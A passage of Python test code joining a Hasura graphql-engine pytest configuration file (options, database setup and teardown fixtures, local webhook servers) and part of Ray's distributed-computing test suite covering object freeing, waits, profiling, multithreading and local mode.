help="Accept any failing test cases from YAML files as correct, and write the new files out to disk."
)
parser.addoption(
"--skip-schema-teardown",
action="store_true",
default=False,
required=False,
help="""
Skip tearing down the schema/Hasura metadata after tests. This option may result in test failures if the schema
has to change between the list of tests to be run
"""
)
parser.addoption(
"--skip-schema-setup",
action="store_true",
default=False,
required=False,
help="""
Skip setting up schema/Hasura metadata before tests.
This option may result in test failures if the schema has to change between the list of tests to be run
"""
)
parser.addoption(
"--avoid-error-message-checks",
action="store_true",
default=False,
required=False,
help="""
This option when set will ignore disparity in error messages between expected and response outputs.
Used basically in version upgrade/downgrade tests where the error messages may change
"""
)
parser.addoption(
"--collect-upgrade-tests-to-file",
metavar="<path>",
required=False,
help="When used along with collect-only, it will write the list of upgrade tests into the file specified"
)
parser.addoption(
"--test-unauthorized-role",
action="store_true",
help="Run testcases for unauthorized role",
)
parser.addoption(
"--enable-remote-schema-permissions",
action="store_true",
default=False,
help="Flag to indicate if the graphql-engine has enabled remote schema permissions",
)
parser.addoption(
"--redis-url",
metavar="REDIS_URL",
help="redis url for cache server",
default=False
)
parser.addoption(
"--backend",
help="run integration tests using a particular backend",
default="postgres"
)
parser.addoption(
"--pro-tests",
action="store_true",
default=False,
help="Flag to specify if the pro tests are to be run"
)
parser.addoption(
"--test-developer-api-enabled", action="store_true",
help="Run Test cases with the Developer API Enabled",
default=False
)
#By default,
#1) Set default parallelism to one
#2) Set test grouping to by filename (--dist=loadfile)
def pytest_cmdline_preparse(config, args):
worker = os.environ.get('PYTEST_XDIST_WORKER')
if 'xdist' in sys.modules and not worker: # pytest-xdist plugin
num = 1
args[:] = ["-n" + str(num),"--dist=loadfile"] + args
def pytest_configure(config):
# Pytest has removed the global pytest.config
# As a solution we are going to store it in PytestConf.config
PytestConf.config = config
if is_help_option_present(config):
return
if is_master(config):
if not config.getoption('--hge-urls'):
print("hge-urls should be specified")
if not config.getoption('--pg-urls'):
print("pg-urls should be specified")
config.hge_url_list = config.getoption('--hge-urls')
config.pg_url_list = config.getoption('--pg-urls')
config.hge_ctx_gql_server = HGECtxGQLServer(config.hge_url_list)
if config.getoption('-n', default=None):
xdist_threads = config.getoption('-n')
assert xdist_threads <= len(config.hge_url_list), "Not enough hge_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.hge_url_list))
assert xdist_threads <= len(config.pg_url_list), "Not enough pg_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.pg_url_list))
random.seed(datetime.now())
@pytest.hookimpl()
def pytest_report_collectionfinish(config, startdir, items):
"""
Collect server upgrade tests to the given file
"""
tests_file = config.getoption('--collect-upgrade-tests-to-file')
sep=''
tests=OrderedDict()
if tests_file:
def is_upgrade_test(item):
# Check if allow_server_upgrade_tests marker are present
# skip_server_upgrade_tests marker is not present
return item.get_closest_marker('allow_server_upgrade_test') \
and not item.get_closest_marker('skip_server_upgrade_test')
with open(tests_file,'w') as f:
upgrade_items = filter(is_upgrade_test, items)
for item in upgrade_items:
# This test should be run separately,
# since its schema setup has function scope
if 'per_method_tests_db_state' in item.fixturenames:
tests[item.nodeid] = True
elif any([ (x in item.fixturenames)
for x in
[ 'per_class_tests_db_state',
'per_class_db_schema_for_mutation_tests'
]
]):
# For this test, schema setup has class scope
# We can run a class of these tests at a time
tests[item.parent.nodeid] = True
# Assume tests can only be run separately
else:
tests[item.nodeid] = True
for test in tests.keys():
f.write(test + '\n')
return ''
@pytest.hookimpl(optionalhook=True)
def pytest_configure_node(node):
if is_help_option_present(node.config):
return
# Pytest has removed the global pytest.config
node.slaveinput["hge-url"] = node.config.hge_url_list.pop()
node.slaveinput["pg-url"] = node.config.pg_url_list.pop()
def pytest_unconfigure(config):
if is_help_option_present(config):
return
config.hge_ctx_gql_server.teardown()
@pytest.fixture(scope='module')
def hge_ctx(request):
config = request.config
print("create hge_ctx")
if is_master(config):
hge_url = config.hge_url_list[0]
else:
hge_url = config.slaveinput["hge-url"]
if is_master(config):
pg_url = config.pg_url_list[0]
else:
pg_url = config.slaveinput["pg-url"]
try:
hge_ctx = HGECtx(hge_url, pg_url, config)
except HGECtxError as e:
assert False, "Error from hge_ctx: " + str(e)
# TODO this breaks things (https://github.com/pytest-dev/pytest-xdist/issues/86)
# so at least make sure the real error gets printed (above)
pytest.exit(str(e))
yield hge_ctx # provide the fixture value
print("teardown hge_ctx")
hge_ctx.teardown()
# TODO why do we sleep here?
time.sleep(1)
@pytest.fixture(scope='class')
def evts_webhook(request):
webhook_httpd = EvtsWebhookServer(server_address=('127.0.0.1', 5592))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='module')
def actions_fixture(hge_ctx):
if hge_ctx.is_default_backend:
pg_version = hge_ctx.pg_version
if pg_version < 100000: # version less than 10.0
pytest.skip('Actions are not supported on Postgres version < 10')
# Start actions' webhook server
webhook_httpd = ActionsWebhookServer(hge_ctx, server_address=('127.0.0.1', 5593))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
use_action_fixtures = pytest.mark.usefixtures(
"actions_fixture",
'per_class_db_schema_for_mutation_tests',
'per_method_db_data_for_mutation_tests'
)
@pytest.fixture(scope='class')
def functions_permissions_fixtures(hge_ctx):
if not hge_ctx.function_permissions:
pytest.skip('These tests are meant to be run with --test-function-permissions set')
return
use_function_permission_fixtures = pytest.mark.usefixtures(
'per_class_db_schema_for_mutation_tests',
'per_method_db_data_for_mutation_tests',
'functions_permissions_fixtures'
)
@pytest.fixture(scope='class')
def pro_tests_fixtures(hge_ctx):
if not hge_ctx.pro_tests:
pytest.skip('These tests are meant to be run with --pro-tests set')
return
@pytest.fixture(scope='class')
def scheduled_triggers_evts_webhook(request):
webhook_httpd = EvtsWebhookServer(server_address=('127.0.0.1', 5594))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='class')
def gql_server(request, hge_ctx):
server = HGECtxGQLServer(request.config.getoption('--pg-urls'), 5991)
yield server
server.teardown()
@pytest.fixture(scope='class')
def ws_client(request, hge_ctx):
"""
This fixture provides an Apollo GraphQL websockets client
"""
client = GQLWsClient(hge_ctx, '/v1/graphql')
time.sleep(0.1)
yield client
client.teardown()
@pytest.fixture(scope='class')
def ws_client_graphql_ws(request, hge_ctx):
"""
This fixture provides an GraphQL-WS client
"""
client = GraphQLWSClient(hge_ctx, '/v1/graphql')
time.sleep(0.1)
yield client
client.teardown()
@pytest.fixture(scope='class')
def per_class_tests_db_state(request, hge_ctx):
"""
Set up the database state for select queries.
Has a class level scope, since select queries does not change database state
Expects either `dir()` method which provides the directory
with `setup.yaml` and `teardown.yaml` files
Or class variables `setup_files` and `teardown_files` that provides
the list of setup and teardown files respectively.
By default, for a postgres backend the setup and teardown is done via
the `/v1/query` endpoint, to setup using the `/v1/metadata` (metadata setup)
and `/v2/query` (DB setup), set the `setup_metadata_api_version` to "v2"
"""
yield from db_state_context(request, hge_ctx)
@pytest.fixture(scope='function')
def per_method_tests_db_state(request, hge_ctx):
"""
This fixture sets up the database state for metadata operations
Has a function level scope, since metadata operations may change both the schema and data
Class method/variable requirements are similar to that of per_class_tests_db_state fixture
"""
yield from db_state_context(request, hge_ctx)
@pytest.fixture(scope='class')
def per_class_db_schema_for_mutation_tests(request, hge_ctx):
"""
This fixture sets up the database schema for mutations.
It has a class level scope, since mutations does not change schema.
Expects either `dir()` class method which provides the directory with `schema_setup.yaml` and `schema_teardown.yaml` files,
or variables `schema_setup_files` and `schema_teardown_files`
that provides the list of setup and teardown files respectively
"""
# setting the default metadata API version to v1
setup_metadata_api_version = getattr(request.cls, 'setup_metadata_api_version',"v1")
(setup, teardown, schema_setup, schema_teardown, pre_setup, post_teardown) = [
hge_ctx.backend_suffix(filename) + ".yaml"
for filename in ['setup', 'teardown', 'schema_setup', 'schema_teardown', 'pre_setup', 'post_teardown']
]
# only lookup files relevant to the tests being run.
# defaults to postgres file lookup
check_file_exists = hge_ctx.backend == backend
if hge_ctx.is_default_backend:
if setup_metadata_api_version == "v1":
db_context = db_context_with_schema_common(
request, hge_ctx, 'schema_setup_files', 'schema_setup.yaml', 'schema_teardown_files', 'schema_teardown.yaml', check_file_exists
)
else:
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'schema_setup_files', setup, 'schema_teardown_files', teardown,
schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
else:
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'schema_setup_files', setup, 'schema_teardown_files', teardown,
schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
yield from db_context
@pytest.fixture(scope='function')
def per_method_db_data_for_mutation_tests(request, hge_ctx, per_class_db_schema_for_mutation_tests):
"""
This fixture sets up the data for mutations.
Has a function level scope, since mutations may change data.
Having just the setup file(s), or the teardown file(s) is allowed.
Expects either `dir()` class method which provides the directory with `values_setup.yaml` and / or `values_teardown.yaml` files.
The class may provide `values_setup_files` variables which contains the list of data setup files,
Or the `values_teardown_files` variable which provides the list of data teardown files.
"""
# Non-default (Postgres) backend tests expect separate setup and schema_setup
# files for v1/metadata and v2/query requests, respectively.
(values_setup, values_teardown) = [
hge_ctx.backend_suffix(filename) + ".yaml"
for filename in ['values_setup', 'values_teardown']
]
yield from db_context_common(
request, hge_ctx, 'values_setup_files', values_setup,
'values_teardown_files', values_teardown,
False, False, False
)
@pytest.fixture(scope='function')
def backend():
"This fixture provides a default `backend` value for the `per_backend_tests` fixture"
return 'postgres'
@pytest.fixture(scope='function', autouse=True)
def per_backend_tests(hge_ctx, backend):
"""
This fixture ignores backend-specific tests unless the relevant --backend flag has been passed.
"""
# Currently, we default all tests to run on Postgres with or without a --backend flag.
# As our test suite develops, we may consider running backend-agnostic tests on all
# backends, unless a specific `--backend` flag is passed.
if not hge_ctx.backend == backend:
pytest.skip(
'Skipping test. Add --backend ' + backend + ' to run backend-specific tests'
)
return
def db_state_context(request, hge_ctx):
# Non-default (Postgres) backend tests expect separate setup and schema_setup
# files for v1/metadata and v2/query requests, respectively.
(setup, teardown, schema_setup, schema_teardown, pre_setup, post_teardown) = [
hge_ctx.backend_suffix(filename) + ".yaml"
for filename in ['setup', 'teardown', 'schema_setup', 'schema_teardown', 'pre_setup', 'post_teardown']
]
# only lookup files relevant to the tests being run.
# defaults to postgres file lookup
check_file_exists = hge_ctx.backend == backend
# setting the default metadata API version to v1
setup_metadata_api_version = getattr(request.cls, 'setup_metadata_api_version',"v1")
if hge_ctx.is_default_backend:
if setup_metadata_api_version == "v1":
# setup the metadata and DB schema using the `/v1/query` endpoint
db_context = db_context_with_schema_common(
request, hge_ctx, 'setup_files', 'setup.yaml', 'teardown_files',
'teardown.yaml', check_file_exists )
elif setup_metadata_api_version == "v2":
# setup the metadata using the "/v1/metadata" and the DB schema using the `/v2/query` endpoints
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'setup_files', setup, 'teardown_files',
teardown, schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
else:
# setup the metadata using the "/v1/metadata" and the DB schema using the `/v2/query` endpoints
db_context = db_context_with_schema_common_new (
request, hge_ctx, 'setup_files', setup, 'teardown_files',
teardown, schema_setup, schema_teardown, pre_setup, post_teardown, check_file_exists
)
yield from db_context
def db_state_context_new(
request, hge_ctx, setup='setup.yaml', teardown='teardown.yaml',
schema_setup='schema_setup.yaml', schema_teardown='schema_teardown.yaml',
pre_setup='pre_setup.yaml', post_teardown='post_teardown.yaml'):
yield from db_context_with_schema_common_new (
request, hge_ctx, 'setup_files', setup, 'teardown_files',
teardown, schema_setup, schema_teardown, pre_setup, post_teardown, True
)
def db_context_with_schema_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file, check_file_exists=True):
(skip_setup, skip_teardown) = [
request.config.getoption('--' + x)
for x in ['skip-schema-setup', 'skip-schema-teardown']
]
yield from db_context_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file,
check_file_exists, skip_setup, skip_teardown
)
def db_context_with_schema_common_new (
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file, setup_sql_file, teardown_sql_file, pre_setup_file, post_teardown_file, check_file_exists=True):
(skip_setup, skip_teardown) = [
request.config.getoption('--' + x)
for x in ['skip-schema-setup', 'skip-schema-teardown']
]
yield from db_context_common_new (
request, hge_ctx, setup_files_attr, setup_default_file, setup_sql_file,
teardown_files_attr, teardown_default_file, teardown_sql_file,
pre_setup_file, post_teardown_file,
check_file_exists, skip_setup, skip_teardown
)
def db_context_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file,
check_file_exists=True, skip_setup=True, skip_teardown=True ):
def get_files(attr, default_file):
files = getattr(request.cls, attr, None)
if not files:
files = os.path.join(request.cls.dir(), default_file)
return files
setup = get_files(setup_files_attr, setup_default_file)
teardown = get_files(teardown_files_attr, teardown_default_file)
if hge_ctx.is_default_backend:
yield from setup_and_teardown_v1q(request, hge_ctx, setup, teardown, check_file_exists, skip_setup, skip_teardown)
else:
yield from setup_and_teardown_v2q(request, hge_ctx, setup, teardown, check_file_exists, skip_setup, skip_teardown)
def db_context_common_new(
request, hge_ctx, setup_files_attr, setup_default_file,
setup_default_sql_file,
teardown_files_attr, teardown_default_file, teardown_default_sql_file,
pre_setup_file, post_teardown_file,
check_file_exists=True, skip_setup=True, skip_teardown=True ):
def get_files(attr, default_file):
files = getattr(request.cls, attr, None)
if not files:
files = os.path.join(request.cls.dir(), default_file)
return files
setup = get_files(setup_files_attr, setup_default_file)
teardown = get_files(teardown_files_attr, teardown_default_file)
setup_default_sql_file = os.path.join(request.cls.dir(), setup_default_sql_file)
teardown_default_sql_file = os.path.join(request.cls.dir(), teardown_default_sql_file)
pre_setup_default_file = os.path.join(request.cls.dir(), pre_setup_file)
post_teardown_default_file = os.path.join(request.cls.dir(), post_teardown_file)
yield from setup_and_teardown( request, hge_ctx, setup, teardown,
setup_default_sql_file, teardown_default_sql_file, pre_setup_default_file, post_teardown_default_file,
check_file_exists, skip_setup, skip_teardown)
def setup_and_teardown_v1q(request, hge_ctx, setup_files, teardown_files, check_file_exists=True, skip_setup=False, skip_teardown=False):
def assert_file_exists(f):
assert os.path.isfile(f), 'Could not find file ' + f
if check_file_exists:
for o in [setup_files, teardown_files]:
run_on_elem_or_list(assert_file_exists, o)
def v1q_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v1q_f(f)
assert st_code == 200, resp
if not skip_setup:
run_on_elem_or_list(v1q_f, setup_files)
yield
# Teardown anyway if any of the tests have failed
if request.session.testsfailed > 0 or not skip_teardown:
run_on_elem_or_list(v1q_f, teardown_files)
def setup_and_teardown_v2q(request, hge_ctx, setup_files, teardown_files, check_file_exists=True, skip_setup=False, skip_teardown=False):
def assert_file_exists(f):
assert os.path.isfile(f), 'Could not find file ' + f
if check_file_exists:
for o in [setup_files, teardown_files]:
run_on_elem_or_list(assert_file_exists, o)
def v2q_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v2q_f(f)
assert st_code == 200, resp
if not skip_setup:
run_on_elem_or_list(v2q_f, setup_files)
yield
# Teardown anyway if any of the tests have failed
if request.session.testsfailed > 0 or not skip_teardown:
run_on_elem_or_list(v2q_f, teardown_files)
def setup_and_teardown(request, hge_ctx, setup_files, teardown_files,
sql_schema_setup_file,sql_schema_teardown_file,
pre_setup_file, post_teardown_file,
check_file_exists=True, skip_setup=False, skip_teardown=False):
def assert_file_exists(f):
assert os.path.isfile(f), 'Could not find file ' + f
if check_file_exists:
for o in [setup_files, teardown_files, sql_schema_setup_file, sql_schema_teardown_file]:
run_on_elem_or_list(assert_file_exists, o)
def v2q_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v2q_f(f)
if st_code != 200:
run_on_elem_or_list(pre_post_metadataq_f, post_teardown_file)
assert_response_code('/v2/query', f, st_code, 200, resp)
def metadataq_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v1metadataq_f(f)
if st_code != 200:
# drop the sql setup, if the metadata calls fail
run_on_elem_or_list(v2q_f, sql_schema_teardown_file)
run_on_elem_or_list(pre_post_metadataq_f, post_teardown_file)
assert_response_code('/v1/metadata', f, st_code, 200, resp)
def pre_post_metadataq_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v1metadataq_f(f)
assert_response_code('/v1/metadata', f, st_code, 200, resp)
if not skip_setup:
run_on_elem_or_list(pre_post_metadataq_f, pre_setup_file)
run_on_elem_or_list(v2q_f, sql_schema_setup_file)
run_on_elem_or_list(metadataq_f, setup_files)
yield
# Teardown anyway if any of the tests have failed
if request.session.testsfailed > 0 or not skip_teardown:
run_on_elem_or_list(metadataq_f, teardown_files)
run_on_elem_or_list(v2q_f, sql_schema_teardown_file)
run_on_elem_or_list(pre_post_metadataq_f, post_teardown_file)
def run_on_elem_or_list(f, x):
if isinstance(x, str):
return [f(x)]
elif isinstance(x, list):
return [f(e) for e in x]
def is_help_option_present(config):
return any([
config.getoption(x)
for x in ['--fixtures','--help', '--collect-only']
])
def is_master(config):
"""True if the code running the given pytest.config object is running in a xdist master
node or not running xdist at all.
"""
return not hasattr(config, 'slaveinput')
|
test_advanced.py
|
# coding: utf-8
from concurrent.futures import ThreadPoolExecutor
import json
import logging
import random
import sys
import threading
import time
import numpy as np
import pytest
import ray
import ray.cluster_utils
import ray.test_utils
from ray.test_utils import RayTestTimeoutException
logger = logging.getLogger(__name__)
# issue https://github.com/ray-project/ray/issues/7105
def test_internal_free(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
class Sampler:
def sample(self):
return [1, 2, 3, 4, 5]
def sample_big(self):
return np.zeros(1024 * 1024)
sampler = Sampler.remote()
# Free does not delete from in-memory store.
obj_id = sampler.sample.remote()
ray.get(obj_id)
ray.internal.free(obj_id)
assert ray.get(obj_id) == [1, 2, 3, 4, 5]
# Free deletes big objects from plasma store.
big_id = sampler.sample_big.remote()
ray.get(big_id)
ray.internal.free(big_id)
time.sleep(1) # wait for delete RPC to propagate
with pytest.raises(Exception):
ray.get(big_id)
def test_wait_iterables(ray_start_regular):
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(ray_start_regular):
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(ray_start_2_cpus):
@ray.remote
def f():
with ray.profile("custom_event", extra_data={"name": "custom name"}):
pass
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
profile_data = ray.timeline()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
if time.time() - start_time > timeout_seconds:
raise RayTestTimeoutException(
"Timed out while waiting for information in "
"profile table. Missing events: {}.".format(
set(expected_types) - set(event_types)))
# The profiling information only flushes once every second.
time.sleep(1.1)
def test_wait_cluster(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
ray.init(address=cluster.address)
@ray.remote(resources={"RemoteResource": 1})
def f():
return
# Make sure we have enough workers on the remote nodes to execute some
# tasks.
tasks = [f.remote() for _ in range(10)]
start = time.time()
ray.get(tasks)
end = time.time()
# Submit some more tasks that can only be executed on the remote nodes.
tasks = [f.remote() for _ in range(10)]
# Sleep for a bit to let the tasks finish.
time.sleep((end - start) * 2)
_, unready = ray.wait(tasks, num_returns=len(tasks), timeout=0)
# All remote tasks should have finished.
assert len(unready) == 0
@pytest.mark.skip(reason="TODO(ekl)")
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(address=cluster.address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.object_transfer_timeline()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(ray_start_regular):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(ray_start_regular):
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
def test_multithreading(ray_start_2_cpus):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
@ray.remote
class Echo:
def echo(self, value):
return value
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor:
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
ray.get(actor.join.remote()) == "ok"
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return ObjectIDs.
assert isinstance(xref, ray.ObjectID)
assert np.alltrue(ray.get(xref) == np.ones([3, 4, 5]))
y = np.random.normal(size=[11, 12])
# Check that ray.get(ray.put) is the identity.
assert np.alltrue(y == ray.get(ray.put(y)))
# Make sure objects are immutable, this example is why we need to copy
# arguments before passing them into remote functions in python mode
aref = local_mode_f.remote()
assert np.alltrue(ray.get(aref) == np.array([0, 0]))
bref = local_mode_g.remote(ray.get(aref))
# Make sure local_mode_g does not mutate aref.
assert np.alltrue(ray.get(aref) == np.array([0, 0]))
assert np.alltrue(ray.get(bref) == np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert ready == object_ids[:num_returns]
assert remaining == object_ids[num_returns:]
# Check that ray.put() and ray.internal.free() work in local mode.
v1 = np.ones(10)
v2 = np.zeros(10)
k1 = ray.put(v1)
assert np.alltrue(v1 == ray.get(k1))
k2 = ray.put(v2)
assert np.alltrue(v2 == ray.get(k2))
ray.internal.free([k1, k2])
with pytest.raises(Exception):
ray.get(k1)
with pytest.raises(Exception):
ray.get(k2)
# Should fail silently.
ray.internal.free([k1, k2])
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass:
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
@ray.method(num_return_vals=3)
def returns_multiple(self):
return 1, 2, 3
test_actor = LocalModeTestClass.remote(np.arange(10))
obj = test_actor.get_array.remote()
assert isinstance(obj, ray.ObjectID)
assert np.alltrue(ray.get(obj) == np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert np.alltrue(test_array == np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert np.alltrue(test_array == ray.get(test_actor.get_array.remote()))
# Check that actor handles work in local mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
